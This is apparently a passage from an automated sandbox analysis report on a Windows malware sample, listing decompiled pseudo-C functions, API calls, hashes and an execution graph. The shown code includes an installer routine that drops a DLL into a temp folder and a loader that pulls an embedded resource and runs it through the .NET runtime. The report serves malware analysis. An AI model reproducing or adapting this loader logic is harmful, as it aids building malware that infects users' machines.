                                                                                            							break;
                                                                                            						}
                                                                                            						if(_t26 != 0) {
                                                                                            							continue;
                                                                                            						}
                                                                                            						goto L7;
                                                                                            					}
                                                                                            					 *0x423680 = _t18[1];
                                                                                            					 *0x423f48 = _t18[3];
                                                                                            					_t23 =  &(_t18[5]);
                                                                                            					if(_t23 != 0) {
                                                                                            						 *0x42367c = _t23;
                                                                                            						E004059E3(_t24,  *_t18 & 0x0000ffff);
                                                                                            						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
                                                                                            						_t11 =  *0x423ecc;
                                                                                            						_t27 =  *0x423ec8;
                                                                                            						if(_t11 == 0) {
                                                                                            							L15:
                                                                                            							return _t11;
                                                                                            						}
                                                                                            						_t25 = _t11;
                                                                                            						do {
                                                                                            							_t11 =  *_t27;
                                                                                            							if(_t11 != 0) {
                                                                                            								_t11 = E00405AA7(_t13, _t25, _t27, _t27 + 0x18, _t11);
                                                                                            							}
                                                                                            							_t27 = _t27 + 0x418;
                                                                                            							_t25 = _t25 - 1;
                                                                                            						} while (_t25 != 0);
                                                                                            						goto L15;
                                                                                            					}
                                                                                            					L7:
                                                                                            					if(_t13 != 0xffff) {
                                                                                            						_t13 = 0;
                                                                                            					} else {
                                                                                            						_t13 = 0x3ff;
                                                                                            					}
                                                                                            				}
                                                                                            			}
















                                                                                            0x0040389b
                                                                                            0x004038a0
                                                                                            0x004038a6
                                                                                            0x004038ab
                                                                                            0x004038ab
                                                                                            0x004038b3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004038bb
                                                                                            0x004038c3
                                                                                            0x004038c5
                                                                                            0x004038cb
                                                                                            0x004038cb
                                                                                            0x004038cd
                                                                                            0x004038d9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004038dd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004038df
                                                                                            0x004038e4
                                                                                            0x004038ed
                                                                                            0x004038f3
                                                                                            0x004038f8
                                                                                            0x0040390c
                                                                                            0x00403917
                                                                                            0x0040392f
                                                                                            0x00403935
                                                                                            0x0040393a
                                                                                            0x00403942
                                                                                            0x00403963
                                                                                            0x00403963
                                                                                            0x00403963
                                                                                            0x00403944
                                                                                            0x00403946
                                                                                            0x00403946
                                                                                            0x0040394a
                                                                                            0x00403951
                                                                                            0x00403951
                                                                                            0x00403956
                                                                                            0x0040395c
                                                                                            0x0040395c
                                                                                            0x00000000
                                                                                            0x00403946
                                                                                            0x004038fa
                                                                                            0x004038ff
                                                                                            0x00403908
                                                                                            0x00403901
                                                                                            0x00403901
                                                                                            0x00403901
                                                                                            0x004038ff

                                                                                            APIs
                                                                                            • SetWindowTextA.USER32(00000000,004236A0), ref: 0040392F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: TextWindow
                                                                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 530164218-517883005
                                                                                            • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                                                                                            • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                                                                                            • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                                                                                            • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                            				long _t22;
                                                                                            
                                                                                            				if(_a8 != 0x102) {
                                                                                            					if(_a8 != 0x200) {
                                                                                            						_t22 = _a16;
                                                                                            						L7:
                                                                                            						if(_a8 == 0x419 &&  *0x420480 != _t22) {
                                                                                            							 *0x420480 = _t22;
                                                                                            							E00405A85(0x420498, 0x424000);
                                                                                            							E004059E3(0x424000, _t22);
                                                                                            							E0040140B(6);
                                                                                            							E00405A85(0x424000, 0x420498);
                                                                                            						}
                                                                                            						L11:
                                                                                            						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
                                                                                            					}
                                                                                            					if(IsWindowVisible(_a4) == 0) {
                                                                                            						L10:
                                                                                            						_t22 = _a16;
                                                                                            						goto L11;
                                                                                            					}
                                                                                            					_t22 = E004046F2(_a4, 1);
                                                                                            					_a8 = 0x419;
                                                                                            					goto L7;
                                                                                            				}
                                                                                            				if(_a12 != 0x20) {
                                                                                            					goto L10;
                                                                                            				}
                                                                                            				E00403E83(0x413);
                                                                                            				return 0;
                                                                                            			}




                                                                                            0x00404d7f
                                                                                            0x00404da4
                                                                                            0x00404dc4
                                                                                            0x00404dc7
                                                                                            0x00404dca
                                                                                            0x00404de1
                                                                                            0x00404de7
                                                                                            0x00404dee
                                                                                            0x00404df5
                                                                                            0x00404dfc
                                                                                            0x00404e01
                                                                                            0x00404e07
                                                                                            0x00000000
                                                                                            0x00404e17
                                                                                            0x00404db1
                                                                                            0x00404e04
                                                                                            0x00404e04
                                                                                            0x00000000
                                                                                            0x00404e04
                                                                                            0x00404dbd
                                                                                            0x00404dbf
                                                                                            0x00000000
                                                                                            0x00404dbf
                                                                                            0x00404d85
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404d8c
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 00404DA9
                                                                                            • CallWindowProcA.USER32 ref: 00404E17
                                                                                              • Part of subcall function 00403E83: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E95
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3748168415-3916222277
                                                                                            • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                                                                                            • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                                                                                            • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                                                                                            • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                                                            				int _t5;
                                                                                            				long _t7;
                                                                                            				struct _OVERLAPPED* _t11;
                                                                                            				intOrPtr* _t15;
                                                                                            				void* _t17;
                                                                                            				int _t21;
                                                                                            
                                                                                            				_t15 = __esi;
                                                                                            				_t11 = __ebx;
                                                                                            				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                                                                            					_t7 = lstrlenA(E004029E8(0x11));
                                                                                            				} else {
                                                                                            					E004029CB(1);
                                                                                            					 *0x409f68 = __al;
                                                                                            				}
                                                                                            				if( *_t15 == _t11) {
                                                                                            					L8:
                                                                                            					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                            				} else {
                                                                                            					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsr28EF.tmp\eqbaypenr.dll", _t7, _t17 + 8, _t11);
                                                                                            					_t21 = _t5;
                                                                                            					if(_t21 == 0) {
                                                                                            						goto L8;
                                                                                            					}
                                                                                            				}
                                                                                            				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
                                                                                            				return 0;
                                                                                            			}









                                                                                            0x004024b0
                                                                                            0x004024b0
                                                                                            0x004024b3
                                                                                            0x004024ce
                                                                                            0x004024b5
                                                                                            0x004024b7
                                                                                            0x004024bc
                                                                                            0x004024c3
                                                                                            0x004024d5
                                                                                            0x0040264e
                                                                                            0x0040264e
                                                                                            0x004024db
                                                                                            0x004024ed
                                                                                            0x004015a6
                                                                                            0x004015a8
                                                                                            0x00000000
                                                                                            0x004015ae
                                                                                            0x004015a8
                                                                                            0x00402880
                                                                                            0x0040288c

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                                                                                            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsr28EF.tmp\eqbaypenr.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nsr28EF.tmp\eqbaypenr.dll, xrefs: 004024BC, 004024E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWritelstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsr28EF.tmp\eqbaypenr.dll
                                                                                            • API String ID: 427699356-3874607955
                                                                                            • Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                                                                                            • Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
                                                                                            • Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                                                                                            • Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E004055BF(char* _a4) {
                                                                                            				char* _t3;
                                                                                            				char* _t5;
                                                                                            
                                                                                            				_t5 = _a4;
                                                                                            				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                            				while( *_t3 != 0x5c) {
                                                                                            					_t3 = CharPrevA(_t5, _t3);
                                                                                            					if(_t3 > _t5) {
                                                                                            						continue;
                                                                                            					}
                                                                                            					break;
                                                                                            				}
                                                                                            				 *_t3 =  *_t3 & 0x00000000;
                                                                                            				return  &(_t3[1]);
                                                                                            			}





                                                                                            0x004055c0
                                                                                            0x004055ca
                                                                                            0x004055cc
                                                                                            0x004055d3
                                                                                            0x004055db
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004055db
                                                                                            0x004055dd
                                                                                            0x004055e2

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\O53TFikPkp.exe,C:\Users\user\Desktop\O53TFikPkp.exe,80000000,00000003), ref: 004055C5
                                                                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\O53TFikPkp.exe,C:\Users\user\Desktop\O53TFikPkp.exe,80000000,00000003), ref: 004055D3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrlen
                                                                                            • String ID: C:\Users\user\Desktop
                                                                                            • API String ID: 2709904686-224404859
                                                                                            • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                            • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                                                                                            • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                            • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E004056D1(CHAR* _a4, CHAR* _a8) {
                                                                                            				int _t10;
                                                                                            				int _t15;
                                                                                            				CHAR* _t16;
                                                                                            
                                                                                            				_t15 = lstrlenA(_a8);
                                                                                            				_t16 = _a4;
                                                                                            				while(lstrlenA(_t16) >= _t15) {
                                                                                            					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                                                            					_t10 = lstrcmpiA(_t16, _a8);
                                                                                            					if(_t10 == 0) {
                                                                                            						return _t16;
                                                                                            					}
                                                                                            					_t16 = CharNextA(_t16);
                                                                                            				}
                                                                                            				return 0;
                                                                                            			}






                                                                                            0x004056dd
                                                                                            0x004056df
                                                                                            0x00405707
                                                                                            0x004056ec
                                                                                            0x004056f1
                                                                                            0x004056fc
                                                                                            0x00000000
                                                                                            0x00405719
                                                                                            0x00405705
                                                                                            0x00405705
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                                                                                            • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
                                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 190613189-0
                                                                                            • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                            • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                                                                                            • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                            • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:10.8%
                                                                                            Dynamic/Decrypted Code Coverage:66.2%
                                                                                            Signature Coverage:6.4%
                                                                                            Total number of Nodes:204
                                                                                            Total number of Limit Nodes:19

                                                                                            Graph

                                                                                            execution_graph 54372 710a70 54373 710a76 KiUserExceptionDispatcher 54372->54373 54383 710ad4 54373->54383 54375 710cd3 LdrInitializeThunk 54377 710d1b 54375->54377 54376 7110f1 KiUserExceptionDispatcher 54378 71110d 54376->54378 54377->54376 54379 7112de 54378->54379 54387 46dbe8 54378->54387 54385 46dbe8 4 API calls 54379->54385 54395 46dc48 54379->54395 54380 711323 54381 711a4d KiUserExceptionDispatcher 54380->54381 54382 711a6c 54381->54382 54383->54375 54385->54380 54389 46db9c 54387->54389 54390 46dbf7 54387->54390 54388 46dc09 54388->54379 54389->54379 54390->54388 54391 46e5b4 RegQueryValueExW 54390->54391 54394 46e5c0 RegQueryValueExW 54390->54394 54402 46e34d 54390->54402 54406 46e358 54390->54406 54391->54390 54394->54390 54397 46dc67 54395->54397 54396 46ded0 54396->54380 54397->54396 54398 46e5c0 RegQueryValueExW 54397->54398 54399 46e5b4 RegQueryValueExW 54397->54399 54400 46e34d RegOpenKeyExW 54397->54400 54401 46e358 RegOpenKeyExW 54397->54401 54398->54397 54399->54397 54400->54397 54401->54397 54403 46e3aa RegOpenKeyExW 54402->54403 54405 46e41e 54403->54405 54407 46e3aa RegOpenKeyExW 54406->54407 54409 46e41e 54407->54409 54605 401711 54610 401e1d SetUnhandledExceptionFilter 54605->54610 54607 401716 _com_raise_error 54611 40382f 26 API calls 2 library calls 54607->54611 54609 401721 54610->54607 54611->54609 54410 401723 54411 40172f ___scrt_is_nonwritable_in_current_image 54410->54411 54435 401985 54411->54435 54413 401736 54415 40175f 54413->54415 54464 401c88 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 54413->54464 54423 40179e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54415->54423 54446 403480 54415->54446 54419 40177e ___scrt_is_nonwritable_in_current_image 54420 4017fe 54454 401da3 54420->54454 54422 401804 54458 401489 GetModuleHandleW FindResourceW 54422->54458 54423->54420 54465 4036df 38 API calls 2 library calls 54423->54465 54436 40198e 54435->54436 54466 40208d IsProcessorFeaturePresent 54436->54466 54438 40199a 54467 4025ba 10 API calls 4 library calls 54438->54467 54440 40199f 54445 4019a3 54440->54445 54468 403d3f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 54440->54468 54442 4019ac 54443 4019ba 54442->54443 54469 4025e3 8 API calls 3 library calls 54442->54469 54443->54413 54445->54413 54449 403497 54446->54449 54448 401778 54448->54419 54450 403424 54448->54450 54470 4018cc 54449->54470 54453 403453 54450->54453 54451 4018cc _ValidateLocalCookies 5 API calls 54452 40347c 54451->54452 54452->54423 54453->54451 54478 402460 54454->54478 54457 401dc9 54457->54422 54459 4014ab GetModuleHandleW LoadResource 54458->54459 54460 4014ec ExitProcess 54458->54460 54461 4014e5 FreeResource 54459->54461 54462 4014bd LockResource GetModuleHandleW SizeofResource 54459->54462 54461->54460 54462->54461 54463 4014da 54462->54463 54463->54461 54464->54413 54465->54420 54466->54438 54467->54440 54468->54442 54469->54445 54471 4018d5 54470->54471 54472 4018d7 IsProcessorFeaturePresent 54470->54472 54471->54448 54474 401f6c 54472->54474 54477 401f30 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 54474->54477 54476 40204f 54476->54448 54477->54476 54479 401db6 GetStartupInfoW 54478->54479 54479->54457 54612 46b510 54613 46b52f LdrInitializeThunk 54612->54613 54615 46b581 54613->54615 54480 71f138 54483 71f15d 54480->54483 54481 71f2d7 54482 71f8bc LdrInitializeThunk 54482->54483 54483->54481 54483->54482 54484 8c4580 54485 8c458f 54484->54485 54488 8c3d54 54485->54488 54490 8c3d5f 54488->54490 54492 8c3db8 54490->54492 54493 8c3dc3 54492->54493 54494 8c4cc5 54493->54494 54495 8c4d20 54493->54495 54499 8c5fe0 54493->54499 54494->54495 54504 8ce1f1 54494->54504 54508 8ce200 54494->54508 54500 8c6001 54499->54500 54501 8c6025 54500->54501 54512 8c6190 54500->54512 54516 8c6182 54500->54516 54501->54494 54506 8ce265 54504->54506 54505 8ce6c8 WaitMessage 54505->54506 54506->54505 54507 8ce2b2 54506->54507 54507->54495 54511 8ce265 54508->54511 54509 8ce6c8 WaitMessage 54509->54511 54510 8ce2b2 54510->54495 54511->54509 54511->54510 54514 8c619d 54512->54514 54513 8c61d6 54513->54501 54514->54513 54520 8c48a4 54514->54520 54518 8c6190 54516->54518 54517 8c61d6 54517->54501 54518->54517 54519 8c48a4 LoadLibraryExW 54518->54519 54519->54517 54521 8c48af 54520->54521 54523 8c6248 54521->54523 54524 8c48d8 54521->54524 54523->54523 54525 8c48e3 54524->54525 54531 8c48e8 54525->54531 54527 8c62b7 54535 8ca738 54527->54535 54541 8ca750 54527->54541 54528 8c62f0 54528->54523 54534 8c48f3 54531->54534 54532 8c69ec 54532->54527 54533 8c5fe0 LoadLibraryExW 54533->54532 54534->54532 54534->54533 54537 8ca781 54535->54537 54538 8ca7cd 54535->54538 54536 8ca78d 54536->54528 54537->54536 54547 8ca9a8 54537->54547 54550 8ca9b8 54537->54550 54538->54528 54543 8ca781 54541->54543 54544 8ca7cd 54541->54544 54542 8ca78d 54542->54528 54543->54542 54545 8ca9a8 LoadLibraryExW 54543->54545 54546 8ca9b8 LoadLibraryExW 54543->54546 54544->54528 54545->54544 54546->54544 54553 8ca9ea 54547->54553 54548 8ca9c2 54548->54538 54551 8ca9c2 54550->54551 54552 8ca9ea LoadLibraryExW 54550->54552 54551->54538 54552->54551 54554 8caa0b 54553->54554 54556 8caa23 54554->54556 54559 8ca9ea LoadLibraryExW 54554->54559 54560 8cabd8 54554->54560 54555 8caa1b 54555->54556 54564 8c9f18 54555->54564 54556->54548 54559->54555 54561 8cabec 54560->54561 54562 8c9f18 LoadLibraryExW 54561->54562 54563 8cac11 54561->54563 54562->54563 54563->54555 54565 8cac38 LoadLibraryExW 54564->54565 54567 8cacb1 54565->54567 54567->54556 54568 710b9c 54577 710bad 54568->54577 54569 710cd3 LdrInitializeThunk 54571 710d1b 54569->54571 54570 7110f1 KiUserExceptionDispatcher 54572 71110d 54570->54572 54571->54570 54573 7112de 54572->54573 54578 46dbe8 4 API calls 54572->54578 54579 46dbe8 4 API calls 54573->54579 54580 46dc48 4 API calls 54573->54580 54574 711323 54575 711a4d KiUserExceptionDispatcher 54574->54575 54576 711a6c 54575->54576 54577->54569 54578->54573 54579->54574 54580->54574 54581 46fd28 54583 46fd4d 54581->54583 54582 46fd76 54583->54582 54586 8c00bf 54583->54586 54590 8c00d0 54583->54590 54587 8c00c4 54586->54587 54593 8c00f8 54587->54593 54588 8c00de 54588->54582 54592 8c00f8 2 API calls 54590->54592 54591 8c00de 54591->54582 54592->54591 54595 8c00fc 54593->54595 54594 8c0115 54594->54588 54595->54594 54600 8c00f8 GlobalMemoryStatusEx 54595->54600 54602 8c01e0 54595->54602 54596 8c015a 54597 8c015e 54596->54597 54598 8c0226 GlobalMemoryStatusEx 54596->54598 54597->54588 54599 8c0256 54598->54599 54599->54588 54600->54596 54603 8c0226 GlobalMemoryStatusEx 54602->54603 54604 8c0256 54603->54604 54604->54596 54616 40317f 54625 4055c5 GetEnvironmentStringsW 54616->54625 54619 403197 54634 403e03 20 API calls __dosmaperr 54619->54634 54622 4031cc 54623 4031a2 54633 403e03 20 API calls __dosmaperr 54623->54633 54626 403191 54625->54626 54627 4055d9 54625->54627 54626->54619 54632 4031d2 26 API calls 3 library calls 54626->54632 54635 403e3d 54627->54635 54629 4055ed 54642 403e03 20 API calls __dosmaperr 54629->54642 54631 405607 FreeEnvironmentStringsW 54631->54626 54632->54623 54633->54619 54634->54622 54636 403e7b 54635->54636 54641 403e4b _abort 54635->54641 54644 404831 20 API calls _abort 54636->54644 54638 403e66 RtlAllocateHeap 54639 403e79 54638->54639 54638->54641 54639->54629 54641->54636 54641->54638 54643 4068fd 7 API calls 2 library calls 54641->54643 54642->54631 54643->54641 54644->54639

                                                                                            Executed Functions

                                                                                            Control-flow Graph

                                                                                            C-Code - Quality: 100%
                                                                                            			E00401489() {
                                                                                            				void* _v8;
                                                                                            				struct HRSRC__* _t4;
                                                                                            				long _t10;
                                                                                            				struct HRSRC__* _t12;
                                                                                            				void* _t16;
                                                                                            
                                                                                            				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                                                                                            				_t12 = _t4;
                                                                                            				if(_t12 == 0) {
                                                                                            					L6:
                                                                                            					ExitProcess(0);
                                                                                            				}
                                                                                            				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                                                                                            				if(_t16 != 0) {
                                                                                            					_v8 = LockResource(_t16);
                                                                                            					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                                                                                            					_t13 = _v8;
                                                                                            					if(_v8 != 0 && _t10 != 0) {
                                                                                            						L00401000(_t13, _t10); // executed
                                                                                            					}
                                                                                            				}
                                                                                            				FreeResource(_t16);
                                                                                            				goto L6;
                                                                                            			}








                                                                                            0x0040149f
                                                                                            0x004014a5
                                                                                            0x004014a9
                                                                                            0x004014ec
                                                                                            0x004014ee
                                                                                            0x004014ee
                                                                                            0x004014b7
                                                                                            0x004014bb
                                                                                            0x004014c7
                                                                                            0x004014cd
                                                                                            0x004014d3
                                                                                            0x004014d8
                                                                                            0x004014e0
                                                                                            0x004014e0
                                                                                            0x004014d8
                                                                                            0x004014e6
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                                                                                            • FindResourceW.KERNEL32(00000000,?,?,80004003), ref: 0040149F
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                                                                                            • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                                                                                            • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                                                                                            • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                                                                                              • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                                                                                            • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                                                                                            • ExitProcess.KERNEL32 ref: 004014EE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_O53TFikPkp.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                                                                            • String ID: v4.0.30319
                                                                                            • API String ID: 2372384083-3152434051
                                                                                            • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                                            • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                                                                                            • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                                            • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
